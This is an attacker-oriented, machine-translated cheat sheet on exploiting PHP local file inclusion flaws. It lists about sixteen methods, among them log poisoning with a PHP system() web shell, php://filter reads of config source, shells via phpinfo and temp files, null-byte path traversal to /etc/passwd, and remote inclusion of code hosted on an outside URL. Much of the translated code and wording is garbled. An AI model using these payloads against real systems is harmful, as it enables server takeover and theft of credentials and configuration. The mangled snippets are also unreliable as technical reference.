Summary of LFI vulnerability Exploitation

By ettack

Main functions involved
Include (), require (), include_once (), require_once ()
Aggregate (), aggregate (), allow_url_include (), aggregate (), readfile () file (), and file_get_contents (), upload_tmp_dir (), post_max_size (), and max_input_time () and so on
 
 
Typical vulnerability code:
<! -? Php include ($ _ GET ['pages '].'. php ');? ->
 
Black box judgment method:
The file inclusion vulnerability may exist when the URL contains keywords such as path, dir, file, pag, page, archive, p, eng, and language files.
Exploitation of local inclusion vulnerabilities (ignore truncation first)
 
1. It is ideal to include jpg, txt, rar, and other files uploaded on the same server.
2. Logs containing the system, such as apache logs and file system logs. When the apache record format is combined, the logs are usually large and cannot be included successfully. There are automated attack programs that contain logs.
The ghost blog mentioned a space issue. See "evil space-New Breakthrough in PHP local File Inclusion Vulnerability" to solve the space problem. In fact, you can encrypt a sentence in base64 before writing it.
3. environment variables include/proc/self/environ. The session information for accessing the web and parameters for user-agent. The user-agent can be modified on the client. Reference: Shell via LFI-proc/self/environ method // http://hi.baidu.com/root_exp/blog/item/9c0571fc2d1_64fd7887d7d.html
4. contains files, caches, templates, and other files generated by php programs. open-source programs have a high success rate.
5. To use local inclusion to read PHP sensitive files, PHP5 or a later version is required. The source code of "config" is as follows:
Index. php? Pages = php: // filter/read = convert. base64-encode/resource = config
In special cases, the readfile () function is used not to include execution. You can directly read the source code.
6. Use the phpinfo page getshell. Generally, the chances of phpinfo in a web group of large organizations are quite high.
Poc and Introduction Reference to LFI interim document on using phpinfo information // http://www.bkjia.com/Article/201202/119213.html
7. Use the PHP file that contains an error or contains an uninitialized variable, as long as the variable is not initialized, it may attack again. For details, see include () local file inclusion vulnerability as you wish. // http://www.bkjia.com/Article/200809/29748.html
8. Use index. php? Pages = http: // www.2cto.com/path/xss. php? Xss = phpcode (domain information should be considered)
9. contains temporary files. This method is very troublesome. Reference POST method uploads // http://www.php.net/manual/en/features.file-upload.post-method.php
Solution to temporary file deletion: slow connection (Note: The premise is file_uploads = On, max_file_uploadsphp.ini file_uploads = On is added in 5.3.1, and max_file_uploads is added in 5.3.1. By default, up to 20 files are uploaded at)
Windows format: windows has a maximum of four random characters ('A'-'Z', 'a'-'Z', '0'-'9'), such as: c: /windows/temp/php3e. tmp
Linux format: 6 random characters ('A'-'Z', 'a'-'Z', '0'-'9'), for example:/tmp/phpUs7MxA
For two types of upload code for slow connection, refer to PHP security LFI vulnerability GetShell method parade // www.2cto.com/article/201511/94414.html
 
10. When the write permission directory cannot be found, inject the Directory into the log to find the write permission directory. Such as injection <? Php $ s =$ _ GET; @ chdir ($ s ['X']); echo @ system ($ s ['y'])?> To log.
Linux: index. php? Pages =/var/log/apache/logs/error_log % 00 & x =/& y = uname
Windows: index. php? Pages = .. \ apache \ logs \ error. log % 00 & x =. & y = dir
For more information, see PHP local file inclusion (LFI) vulnerability exploitation http://www.bkjia.com/Article/201202/119214.html
11. Use php wrapper, such as php: // input, php: // filter, and data: // include files in PHP 5.2.0 and allow_url_include // http://blog.php-security.org/archives/45-PHP-5.2.0-The allow_url_fopen and allow_url_include mentioned in this article only protects against URL handles from being marked as URL. this affects http (s) and ftp (s), but does not affect the url formats such as php or date.
12. LFI checks whether a directory exists and a column directory, for example
** Index. php? Pages = .. /.. /.. /.. /.. /.. /var/www/dossierexistant /.. /.. /.. /.. /.. /etc/passwd % 00
** This method can be completely judged on TTYshell, but sometimes it is not feasible on the URL. Even if dossierexistant does not exist, passwd content can be displayed.
Index. php? Pages = .. /.. /.. /.. /.. /.. /var/www/dossierexistant /.. /.. /.. /.. /.. /etc/passwd % 00
** FreeBSD "directory listing with PHP file functions" http://websec.wordpress.com/2009... Php-file-functions/column directory
** If the directory does not exist, the header. php + File not found + footer. php will be returned if the directory does not exist. This logic fits the programmer's habits. I used to find a directory with deep logs to get the shell.
13. Contains the SESSION file. The default location of the php save format sess_SESSIONID is/tmp/(PHP Sessions),/var/lib/php/session/(PHP Sessions) /var/lib/php5/(PHP Sessions) and c:/windows/temp/(PHP Sessions.
14. Locate the log file including/proc/self/cmdline or/proc/self/fd/<fd number> (the owner is root, and root is required by default)
See the Local File transfer Sion-Tricks of the Trade http://labs.neohapsis.com/2008/0... Ricks-of-the-trade/is also mentioned to include/var/log/auth. log, but this file is 644 by default.
15, contains the usual location of maillog/var/log/maillog this method is also very good, specific reference "local file compression sion tricks" http://devels-playground.blogspo... Clusion-tricks.html
16. contains a fixed file, which is very weak and can be extracted for integrity. For example, man-in-the-middle attacks are available.
<? Php include ("http: // 172.0.0.1/code. php");?>
 
 
Truncation
(For a brief introduction, many articles mentioned in Google)
There are two considerations for truncation: magic_quotes_gpc () and PHP.
 
1.% 00 empty character truncation. Except for php 5.3.4 and earlier versions, the following truncation is conditional.
2. windows
Linux File names with more than 4096 characters truncated
Windows: the file name is truncated when it exceeds 256 characters
Many references are not listed in detail. This article is intended to help you with LFI.